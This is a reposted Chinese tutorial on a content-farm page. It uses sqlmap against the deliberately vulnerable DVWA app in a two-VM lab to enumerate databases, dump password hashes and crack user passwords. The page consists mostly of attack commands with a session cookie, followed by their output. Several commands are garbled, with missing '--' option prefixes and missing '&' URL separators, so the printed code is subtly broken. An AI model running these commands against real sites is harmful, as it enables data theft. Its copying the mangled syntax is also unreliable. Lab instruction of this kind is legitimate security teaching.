您現在的位置是:電腦技術吧?>? 故障問題 ??>??sqlget注入入門,sql注入攻擊教程??>??正文詳情

sqlget注入入門,sql注入攻擊教程

林涵涵2019-12-12 09:02:10 人圍觀
簡介websql注入攻擊什么是sqlmap?Sqlmap是一個免費的開源工具,用于檢測和利用SQL注入漏洞。它具有很好的特性,即自動處理檢測和利用(數據庫指紋、訪問底層文件系統、命令執sql注入步驟

什么是SQLmap?  SQLmap是一款用來檢測與利用SQL注入漏洞的免費開源工具,有一個非常棒的特性,即對檢測與利用的自動化處理(數據庫指紋、訪問底層文件系統、執行命令)。

  讀者可以通過位于SourceForge的官方網站下載SQLmap源碼:http://sourceforge.net/projects/sqlmap/  SQLmap的作者是誰?  Bernardo DameleAssumpcao Guimaraes (@inquisb),讀者可以通過[email protected]與他取得聯系,以及Miroslav Stampar (@stamparm)讀者可以通過[email protected]與他聯系。

  同時讀者也可以通過[email protected]與SQLmap的所有開發者聯系。

  執行SQLmap的命令是什么?  進入sqlmap.py所在的目錄,執行以下命令:  #python sqlmap.py -h  (譯注:選項列表太長了,而且與最新版本有些差異,所以這里不再列出,請讀者下載最新版在自己機器上看吧)  SQLmap命令選項被歸類為目標(Target)選項、請求(Request)選項、優化、注入、檢測、技巧(Techniques)、指紋、枚舉等。

  如何使用SQLmap:  為方便演示,我們創建兩個虛擬機:  1、受害者機器, windows XP操作系統,運行一個web服務器,同時跑著一個包含漏洞的web應用(DVWA)。

  2、攻擊器機器,使用Ubuntu 12.04,包含SQLmap程序。

  本次實驗的目的:使用SQLmap得到以下信息:  3、枚舉MYSQL用戶名與密碼。

  4、枚舉所有數據庫。

  5、枚舉指定數據庫的數據表。

  6、枚舉指定數據表中的所有用戶名與密碼。

  使用SQLmap之前我們得到需要當前會話cookies等信息,用來在滲透過程中維持連接狀態,這里使用Firefox中名為TamperData的add-on獲取。

  當前得到的cookie為security=high;PHPSESSID=57p5g7f32b3ffv8l45qppudqn3。

  為方便演示,我們將DVWA安全等級設置為low:

  接下來我們進入頁面的SQL Injection部分,輸入任意值并提交。

可以看到get請求的ID參數如下:  http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1Submit=Submit#  因此該頁面就是我們的目標頁面。

  以下命令可以用來檢索當前數據庫和當前用戶:  ./sqlmap.py -uhttp://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1Submit=Submit cookie=PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;security=low -b current-db current-user  使用選項:  1、cookie : 設置我們的cookie值將DVWA安全等級從high設置為low  2、-u : 指定目標URL  3、-b : 獲取DBMS banner  4、current-db : 獲取當前數據庫  5、current-user:獲取當前用戶  結果如下:

  可以看到結果如下:  DBMS : MySQLversion 5.0  OS versionUbuntu 12.04  current user:root  current db :DVWA  以下命令用來枚舉所有的DBMS用戶和密碼hash,在以后更進一步的攻擊中可以對密碼hash進行破解:  sqlmap.py -uhttp://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1Submit=Submit --cookie=PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;security=low --string=Surname --users --password  使用選項:  1、string : 當查詢可用時用來匹配頁面中的字符串  2、users : 枚舉DBMS用戶  3、password : 枚舉DBMS用戶密碼hash

  結果如下:  [*] @kingasmk  [*]@localhost  [*][email protected]'localhost  [*][email protected]'localhost  [*][email protected]  [*] [email protected]'::1  [*][email protected]'kingasmk  [*][email protected]'localhost  數據庫管理系統用戶和密碼hash:  password hash:*C30441E06530498BC86019BF3211B94B3BAB295A  [*] phpmyadmin[1]:  password hash:*C30441E06530498BC86019BF3211B94B3BAB295A  [*] root [4]:  password hash: *C30441E06530498BC86019BF3211B94B3BAB295A  password hash:*C30441E06530498BC86019BF3211B94B3BAB295A  password hash:*C30441E06530498BC86019BF3211B94B3BAB295A  password hash:*C30441E06530498BC86019BF3211B94B3BAB295A  讀者可以使用CainAbel、JohnRipper等工具將密碼hash破解為明文。

以下命令會枚舉系統中所有的數據庫schema:  sqlmap.py -uhttp://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1Submit=Submit  --cookie=PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;security=low --dbs  使用選項:  dbs: 枚舉DBMS中的數據庫

  結果如下:  [*]dvwa  [*]information_schema  [*]mysql  [*]performance_schema  [*]phpmyadmin  下面我們嘗試枚舉DVWA數據表,執行以下命令:  sqlmap.py-u http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1Submit=Submit --cookie=PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;security=low -D dvwa --tables  使用選項:  1、-D : 要枚舉的DBMS數據庫  2、tables : 枚舉DBMS數據庫中的數據表

  得到結果如下:  Database: dvwa  [2 tables]     | guestbook |  | users |     下面獲取用戶表的列,命令如下:  sqlmap.py -uhttp://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1Submit=Submit --cookie=PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;security=low -D dvwa -T users --columns  使用選項:  -T : 要枚舉的DBMS數據庫表  columns : 枚舉DBMS數據庫表中的所有列

  結果如下:  Database: dvwa  Table: users  [6 columns]   -   | Column | Type|   -   | avatar |varchar(70) |  | first_name |varchar(15) |  | last_name |varchar(15) |  | password |varchar(32) |  | user |varchar(15) |  | user_id |int(6) |   -   如上所示,以上為我們感興趣的列,表示用戶名與密碼等。

下面將每一列的內容提取出來。

執行以下命令,將用戶與密碼表中的所有用戶名與密碼dump出來:  sqlmap.py -uhttp://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1Submit=Submitcookie=PHPSESSID=57p5g7f32b3ffv8l45qppudqn3; security=low -D dvwa -T users-C user,password --dump  使用選項:  -T : 要枚舉的DBMS數據表  -C: 要枚舉的DBMS數據表中的列  dump : 轉儲DBMS數據表項  SQLmap會提問是否破解密碼,按回車確認:

  得到所有用戶名與明文密碼如下:  Table: users  [5 entries]     | user_id | user| password |     | 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99(password) |  | 2 | gordonb |e99a18c428cb38d5f260853678922e03 (abc123) |  | 3 | 1337 |8d3533d75ae2c3966d7e0d4fcc69216b (charley) |  | 4 | pablo |0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) |  | 5 | smithy |5f4dcc3b5aa765d61d8327deb882cf99 (password) |     這時我們就可以利用admin帳戶登錄做任何事了。

  總結:  SQLmap是一個非常強大的工具,可以用來簡化操作,并自動處理SQL注入檢測與利用。

  [via infosecinstitute] 注 :更多精彩教程請關注電腦高手教程頻道

版權聲明:本文由 林涵涵 整理編輯。

原標題:sql注入攻擊or,c中的sql注入

轉載注明出處:http://www.dn9ww09s.icu/fault/15340.html

文章評論

    共有條評論來說兩句吧...

    用戶名:

    驗證碼:

作者推薦

  • oracleocr作用,oracle刪庫命令

    oracleocr作用,oracle刪庫命令 相關圖片oracle自動備份今天是2014年4月1日。我忙了一整天終于有時間寫點東西了。前一段時間,我寫了如何在RAC中有備份時恢復OCR。今天,我寫了如何在沒有備份的情況下重建OCR和Ooracle備份命令...

  • angular8,angular 2

    angular8,angular 2 相關圖片angular框架本文主要介紹了angularjs工具angular smart,它可以自動完成用戶界面,包括使用隔離作用域綁定指令和承諾。為了供您參考,我們最近在論壇中添加了一angular能做什么...

  • 水晶報表 指定數據庫,找不到指定的數據庫

    水晶報表 指定數據庫,找不到指定的數據庫 相關圖片選擇數據庫命令Oracle數據庫如何收集指定SQL的執行計劃和解決過程中的ora-00904錯誤(版權聲明,如果需要轉載原文或翻譯的文章,如果轉載的文章用于個人學習,請注明來查找數據庫的...

  • 表空間管理,表空間的管理方式

    表空間管理,表空間的管理方式 相關圖片oracle表空間使用2。Oracle磁盤管理中最高的邏輯層是表空間。必須在Oracle11g中創建的四個表空間是system、sysaux、temp和undotbs1。2系統:存儲oracle表空間概念...

  • 簡單框架,框架怎么畫

    簡單框架,框架怎么畫 相關圖片框架是什么本文主要介紹一個簡單的JavaScript類框架,有助于初學者理解JS類的創建和繼承。對于那些需要幫助的人,請參閱work in progress JavaSc網頁框架...

  • standby怎么用,in standby

    standby怎么用,in standby 相關圖片standby use準備:確認待機時可以支持對象和語句,以確保主庫中的表行可以唯一標識環境:操作系統:Red Hat Linux Enterprise 5 Oracle:11.2.standby mode...

  • exp備份數據庫,oracle備份恢復

    exp備份數據庫,oracle備份恢復 相關圖片exp備份數據庫命令JMYBJS=(描述=(地址=(協議=TCP)(主機=129.1.9.90)(端口=1521))(連接數據=(服務器=DEDICexp導出文件日期...

  • sqlserver建立觸發器,sqlserver查看觸發器

    sqlserver建立觸發器,sqlserver查看觸發器 相關圖片sql觸發器編寫一。存儲過程1。存儲過程的分類存儲過程是一種數據庫對象,它存儲在數據庫中,應用程序可以通過調用來執行,并允許用戶聲明變量和有條件地執行。具有強大編程功能...

  • 數組刪除元素,數組怎么刪除元素

    數組刪除元素,數組怎么刪除元素 相關圖片數組添加元素本文的例子描述了根據元素值通過jQuery刪除數組元素的方法。與您分享以供參考。具體如下:例如,如果不知道數組中C的下標,就刪除元素C?123var arr=[java數組刪除元素...

  • Java數組,jquery數組

    Java數組,jquery數組 相關圖片js數組怎么實現的一。數組數組的定義是一組按順序排列的值。單個值稱為元素。他們的職位有編號。從0開始,整個數組用方括號表示。Var arr=[12,34,56];上面的代碼表示已數組api...

熱評文章

  • oracle10gclient,Oracle10g

    oracle10gclient,Oracle10g 相關圖片oracle10g安裝包Oracle 10g RAC[恢復OCR]-查詢OCR狀態:×/Oracle/product/10g/CRS/bin/ocrcheck prot-601:初始化查看oracle10g版本...

  • 標識列的使用,標識列是什么

    標識列的使用,標識列是什么 相關圖片無法更新標識列現在讓我們看一個表:考慮一下如何在數據庫SQL Server中輕松地向該表添加數據?很容易發現,在ID字段中添加這一列數據是規則的,并且可以遵循。這是一個等比自一個...

  • 怎么設置防火墻,防火墻設置在哪

    怎么設置防火墻,防火墻設置在哪 相關圖片系統防火墻在哪里設置甲骨文和防火墻設置訪問windows甲骨文數據庫后的防火墻,僅僅打開固定的TCP端口方式是不夠的。這個問題的根本原因是windows-Oracle數據庫的BT設關閉防火墻...

  • SQL 存儲過程,SQL查看存儲過程

    SQL 存儲過程,SQL查看存儲過程 相關圖片sql建立存儲過程SQL Server中alter過程和create過程的區別:1。AutoPro期望找到現有的存儲過程,而CREATE不是。2。Alter proc保持sql 調用存儲過程...

  • 客戶端編程,猿編程客戶端

    客戶端編程,猿編程客戶端 相關圖片手機編程本文主要針對MVC框架的一些相關使用問題,介紹了JavaScript客戶端應用程序編程的一些建議。作為參考,您可能會注意到,最近一段時間,越來越多的web應用程編程網站...

  • 數據庫存取方法,數據庫的最小存取單位

    數據庫存取方法,數據庫的最小存取單位 相關圖片數據庫中存儲的是什么一、實現思路:當用戶添加或修改圖片時,控制CommonDialog的showopen對話框,將通用對話框的文件名記錄到變量a中,然后使用app.path查找特定文件系統中最小的數據存...

  • 技能競賽小結,培訓小結

    技能競賽小結,培訓小結 相關圖片轉正個人小結本文主要介紹Android開發中一些耗時的操作總結。根據實際開發經驗,總結出六種耗時的編程操作。請注意,您可以參考在Android軟件開發過程中經常遇到的耗時操實訓總結...

  • 如何新建文件夾并保存,新建文件夾怎么建

    如何新建文件夾并保存,新建文件夾怎么建 相關圖片怎么新建文件夾放照片現在我們差不多完成了,讓我們保存新的查詢。在主菜單上,單擊“文件”菜單中的“保存”命令。如果此查詢是第一次存儲的,屏幕上將彈出一個對話框,詢問...

  • 您未被授權查看該網頁,微信取消網頁登錄授權

    您未被授權查看該網頁,微信取消網頁登錄授權 相關圖片微信不能登錄網頁版怎么解決Android授權訪問該網頁。使用WebView顯示由OAuth version 2.apimplicitgrant授權的頁面。不建議對移動終端使用授權碼授權:qq授權管理中心網頁...

  • 桌面應用程序開發,應用程序是什么

    桌面應用程序開發,應用程序是什么 相關圖片如何開發程序顧名思義,所謂手機程序就是可以安裝在手機上的程序,以改進原有系統的缺點和個性化。隨著科學技術的發展,手機的功能越來越強大。它不像以前那么簡單和僵硬,但...

關注微信

变脸官网查询